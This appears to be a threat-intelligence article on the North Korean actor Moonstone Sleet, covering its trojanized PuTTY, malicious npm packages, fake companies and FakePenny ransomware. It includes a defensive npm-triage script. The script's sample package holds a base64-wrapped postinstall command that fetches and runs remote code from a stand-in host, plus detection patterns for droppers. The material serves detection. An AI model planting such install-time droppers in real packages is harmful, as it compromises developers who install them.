
North Korean Threat Actor Moonstone Sleet Uses Innovative Strategies to Deploy Bespoke Ransomware


Microsoft has identified a North Korean threat actor it tracks as Moonstone Sleet (previously tracked under the temporary designation Storm-1789) that combines well-worn and novel tradecraft to pursue both cyberespionage and revenue-generation objectives. The actor has set up fake companies, trojanized legitimate software, and even built a working malicious game to reach its targets.

Moonstone Sleet has been observed using a trojanized build of PuTTY, the widely used SSH and Telnet client, to gain initial access to organizations. The actor hands the modified PuTTY executable to targets over platforms such as LinkedIn and Telegram; once run, it decrypts and loads an embedded malicious payload, giving the actor a foothold from which to stage further tooling. Moonstone Sleet has also targeted software developers with malicious npm packages, typically presented as part of a skills assessment or a project collaboration.
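The page does not describe what Moonstone Sleet's npm packages actually do, so the following is an added example, not code from the page or from Microsoft's report: a generic pre-install triage script that a reviewer can run on any "take-home assessment" repository before typing `npm install`. It lists lifecycle hooks (which npm executes automatically at install time, the usual home of an install-time dropper) and scans the package's files for patterns common in such droppers. The manifests, the file contents, the hypothetical hostname `example.invalid` and the helper name `audit_package` are all constructed for the demonstration.

```python
"""Pre-install triage of an npm package for install-time code execution.

Added example with constructed inputs, not Moonstone Sleet's actual packages:
npm runs lifecycle hooks such as postinstall automatically during
`npm install`, which is where a malicious "assessment" package usually puts
its dropper.  This script lists those hooks and scans package files for
patterns common in droppers: remote fetches, shell spawning, base64-unpacked
strings and dynamic eval.
"""
import base64
import re

# Hooks npm executes without any further action from the developer.
LIFECYCLE_HOOKS = {
    "preinstall", "install", "postinstall", "prepare",
    "prepublish", "preuninstall", "postuninstall",
}

# Heuristics, not proof: each one is common in install-time droppers but
# also appears in legitimate build tooling, so findings need a human look.
SUSPICIOUS_PATTERNS = {
    "remote fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|https?://)", re.I),
    "process spawn": re.compile(r"child_process|\bexec(Sync)?\(|\bspawn(Sync)?\(", re.I),
    "base64 unpack": re.compile(
        r"from\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]\s*,\s*['\"]base64['\"]"),
    "dynamic eval": re.compile(r"\beval\(|new Function\("),
}


def audit_package(manifest: dict, files: dict) -> list:
    """Return human-readable findings; an empty list means nothing was flagged.

    manifest: the parsed package.json
    files:    mapping of relative path -> source text for the package's files
    """
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in sorted(LIFECYCLE_HOOKS & set(scripts)):
        findings.append(f"lifecycle hook '{hook}' runs: {scripts[hook]}")
        # The hook command line itself may carry the payload (curl | sh etc.).
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(scripts[hook]):
                findings.append(f"  hook '{hook}' matches {label}")
    for path, source in sorted(files.items()):
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(source):
                findings.append(f"{path}: {label}")
    return findings


# --- constructed sample packages (not real artifacts) ---------------------

# A plausible, harmless take-home assessment: only test/start scripts.
BENIGN_MANIFEST = {
    "name": "todo-api-assessment",
    "scripts": {"test": "jest", "start": "node index.js"},
}
BENIGN_FILES = {
    "index.js": "const express = require('express');\n"
                "const app = express();\n"
                "app.get('/', (req, res) => res.send('ok'));\n",
}

# The same assessment with a postinstall hook that runs a base64-wrapped
# shell command through child_process: the classic install-time dropper shape.
# example.invalid is a reserved, non-resolving name used only for the demo.
_ENCODED_CMD = base64.b64encode(b"curl http://example.invalid/stage2 | node").decode()
SUSPICIOUS_MANIFEST = {
    "name": "todo-api-assessment",
    "scripts": {"postinstall": "node scripts/setup.js", "test": "jest"},
}
SUSPICIOUS_FILES = {
    "index.js": BENIGN_FILES["index.js"],
    "scripts/setup.js": "const cp = require('child_process');\n"
                        f"const cmd = Buffer.from('{_ENCODED_CMD}', 'base64').toString();\n"
                        "cp.exec(cmd);\n",
}


if __name__ == "__main__":
    for name, manifest, files in (
        ("benign", BENIGN_MANIFEST, BENIGN_FILES),
        ("suspicious", SUSPICIOUS_MANIFEST, SUSPICIOUS_FILES),
    ):
        print(f"[{name}] {manifest['name']}")
        for line in audit_package(manifest, files) or ["no findings"]:
            print("  " + line)
```

Run against the suspicious sample, the script reports the postinstall hook plus the process-spawn and base64-unpack matches in scripts/setup.js, while the benign sample produces no findings. For any package you do not trust, `npm install --ignore-scripts` stops lifecycle hooks from running at all, but the package's code still executes as soon as you require it, so a review of the sources before use is the real control.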

According to Microsoft's report, Moonstone Sleet's tactics show an ability to adapt and evolve, and they overlap with techniques used by other North Korean threat actors such as Diamond Sleet. That adaptability points to a well-developed operation that keeps investing in new ways to evade defenses.

One of the standout tactics employed by Moonstone Sleet is the use of a custom ransomware variant that Microsoft has named FakePenny. The ransomware was deployed in April 2024 against an organization the actor had already compromised in February, and the actor demanded a ransom of $6.6 million in Bitcoin, underlining the financial side of its motivations. Moonstone Sleet has also developed a fully functional malicious game called DeTankWar, which requires players to register and serves as a vehicle for delivering malware.

The actor promotes the game through fake companies and social media personas, which lend its campaigns a veneer of legitimacy. Moonstone Sleet's operations are notable for their breadth and complexity: it has created fake companies such as StarGlow Ventures and C.C. Waterfall to approach potential targets in the education and software development sectors. These companies serve as a front for building relationships with organizations, whether for future malicious access or for generating revenue.

Moonstone Sleet's ability to run multiple campaigns at once indicates that it is well resourced and capable of expanding its capabilities, including the use of ransomware for disruptive operations. That level of coordination makes it a significant threat to the organizations it targets.

In conclusion, Moonstone Sleet's emergence highlights how quickly the threat landscape evolves and why vigilance and proactive defense matter against adversaries of this sophistication. In practical terms, organizations should treat unsolicited software, take-home coding exercises and partnership approaches from unfamiliar companies as potential delivery vectors: obtain tools such as PuTTY only from their official distribution channels and verify them before use, and review third-party npm packages, including any install-time scripts, before running them. Staying informed about the tactics actors like Moonstone Sleet employ is what allows those controls to keep pace.
